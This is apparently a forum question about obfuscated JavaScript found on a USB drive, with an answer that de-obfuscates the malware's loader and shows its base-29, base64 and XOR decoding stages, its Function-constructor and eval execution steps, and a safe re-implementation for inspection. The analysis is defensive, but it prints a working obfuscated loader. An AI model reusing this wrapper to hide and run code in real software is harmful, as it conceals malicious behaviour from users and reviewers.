
Obfuscated Javascript code?

So a friend of mine had this strange piece of code on his pendrive (probably put there by malware on his computer). What interested me is that the code in question is written in obfuscated Javascript (with an obfuscated piece of autorun.inf to probably infect vulnerable hosts), and besides that, it didn't have any other strange files (I used ClamAV on his pendrive, no malware found).

If it helps, the program in question is located in the 77 folder of the pendrive, and had two copies (exactly the same), each one with a somewhat random filename (see below). The autorun.inf is obviously found in the root.

Can someone explain to me what this piece of code does? The only modification I made was using jsbeautifier.org to indent this code (it was one line of code before).

Main program (77/g66ac.js & 77/i6a6a.js): http://pastebin.com/uj0xSV1e

autorun.inf: http://pastebin.com/Aqnmtiq6

Sorry, I couldn't post the whole code in this topic since it exceeded the character limit, so I had to put it on pastebin.

I've looked into the code and did some investigation. It's more a comment than an answer, but way too long for a comment, so here it is:

(function (paramA, paramB, paramC, paramD) {
    someVar = "";
    try {
        // strip everything except letters and digits, then split the rest into
        // single characters (split([]) behaves like split(""))
        paramB = paramB.replace(/[^A-Z0-9]+/gi, ""), paramB = paramB.split([]), someVar = document;
        return
    } catch (e) {
        // only reached when the try block throws (for example because "document"
        // does not exist outside a browser): read the characters two at a time
        // as base-29 numbers (paramA is parseInt) and turn each into a char code
        for (i = 0; i < paramB.length; i += 2)
            someVar += String.fromCharCode(paramA(paramB[i] + paramB[i + 1], 29));

        // String.fromCharCode.constructor is Function: compile the decoded
        // string into an anonymous function and call it with paramC and paramD
        String.fromCharCode.constructor(someVar)(paramC, paramD)
    }
})(parseInt, string1, string2, string3)

The first few steps alter the text and make one big char array out of it. Then an exception is thrown and we continue in the loop. The loop creates a new string via parseInt. It takes one char and the next one from the array and creates a base 29 number out of it.

The line String.fromCharCode.constructor(someVar)(paramC, paramD);

is tricky, because it takes someVar, which is a string containing JS code, and creates with the constructor function an anonymous function which gets called with paramC and paramD.

The code generated looks like this:

kPxRViGad8nHNstI$BVr8Lf = "";
(function (rycgnpqpq, rycgyjqpq, rycggoqpq, rycglpqpq) {
    // both arguments are run through the base64 decoder (rycglpqpq) first
    rycgnpqpq = rycglpqpq(rycgnpqpq), rycgyjqpq = rycglpqpq(rycgyjqpq);
    try {
        // XOR-decode (rycggoqpq) the second argument with a fixed key, then eval it
        eval(rycggoqpq("5eb9485dd4a658f8bf9318976cd9832392d4904d", rycgyjqpq))
    } catch (rycgbsqpq) {}
})(arguments[0], arguments[1], function (rycgxhqpq, rycgmfqpq) {
    // repeating-key XOR: rycgxhqpq is the key, rycgmfqpq the data
    rycgniqpq = "";
    for (rycgqdqpq = 0; rycgqdqpq < rycgmfqpq.length; rycgqdqpq++)
        rycgniqpq += String.fromCharCode(rycgxhqpq.charCodeAt(rycgqdqpq % rycgxhqpq.length) ^ rycgmfqpq.charCodeAt(rycgqdqpq));
    return rycgniqpq
}, function (rycgunqpq) {
    // hand-rolled base64 decoder
    rycgfyqpq = {}, rycgunqpq = rycgunqpq.replace(/[^+A-Z0-9\/]+/gi, ""), rycguwqpq = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=";
    for (rycgowqpq = 0, rycggdqpq = rycguwqpq.length; rycgowqpq < rycggdqpq; rycgowqpq++) rycgfyqpq[rycguwqpq.charAt(rycgowqpq)] = rycgowqpq;
    rycgdzqpq = [];
    for (rycgorqpq = 0, rycgrfqpq = rycgunqpq.length; rycgorqpq < rycgrfqpq; rycgorqpq += 4)
        rycguuqpq = (rycgfyqpq[rycgunqpq.charAt(rycgorqpq)] || 0) << 18 | (rycgfyqpq[rycgunqpq.charAt(1 + rycgorqpq)] || 0) << 12 | (rycgfyqpq[rycgunqpq.charAt(rycgorqpq + 2)] || 0) << 6 | (rycgfyqpq[rycgunqpq.charAt(3 + rycgorqpq)] || 0), rycgdzqpq.push(rycguuqpq >> 16, rycguuqpq >> 8 & 255, rycguuqpq & 255);
    return rycgdzqpq.length -= [0, 0, 2, 1][rycgunqpq.length % 4], String.fromCharCode.apply(String, rycgdzqpq)
});

This is a multiply nested function. It ultimately creates a very big script and runs it within an eval. The third script looks like some spy script because it contains strings like homepage_is_newtabpage, last_prompted_google_url, stackoverflow, facebook, etc.
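A safe way to inspect both decoding stages this answer describes, as an added example that is neither the poster's code nor the malware's: the loader's base-29 pair decoder and the generated script's XOR-over-base64 helpers, with the Function()/eval step replaced by returning the decoded text. All sample inputs are constructed, and atob stands in for the script's own base64 routine.

```javascript
// Added example, not code from the original post: re-implements the two decoding
// stages so the payload can be read as text instead of being executed.

// Stage 1 (the outer loader): strip non-alphanumerics, then read the remaining
// characters two at a time as base-29 numbers and turn each into a char code.
function decodeBase29Pairs(blob) {
    const digits = blob.replace(/[^A-Z0-9]+/gi, "").split("");
    let out = "";
    for (let i = 0; i + 1 < digits.length; i += 2) {
        out += String.fromCharCode(parseInt(digits[i] + digits[i + 1], 29));
    }
    return out;
}

// Inverse of stage 1, used only to build a constructed sample blob offline.
function encodeBase29Pairs(text) {
    let out = "";
    for (const ch of text) {
        out += ch.charCodeAt(0).toString(29).padStart(2, "0");
    }
    return out;
}

// Stage 2 helper from the generated script: repeating-key XOR over a string.
function xorWithKey(key, data) {
    let out = "";
    for (let i = 0; i < data.length; i++) {
        out += String.fromCharCode(key.charCodeAt(i % key.length) ^ data.charCodeAt(i));
    }
    return out;
}

// Stage 2: base64-decode the argument (atob instead of the script's own decoder),
// then XOR it with the key. The original script passed this result to eval.
function decodeStage2(key, b64) {
    return xorWithKey(key, atob(b64.replace(/[^+A-Z0-9\/=]+/gi, "")));
}

// Constructed, harmless samples standing in for the blobs the loader carried.
const sampleStage1 = encodeBase29Pairs('console.log("stage 1 decoded")');
const sampleKey = "constructed-key";
const sampleStage2 = btoa(xorWithKey(sampleKey, 'console.log("stage 2 decoded")'));

console.log(decodeBase29Pairs(sampleStage1));
console.log(decodeStage2(sampleKey, sampleStage2));
```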

It's a fail of some sort: it's trying to rewrite the document with something that's probably a phishing or ransomware redirect, but it doesn't work correctly.

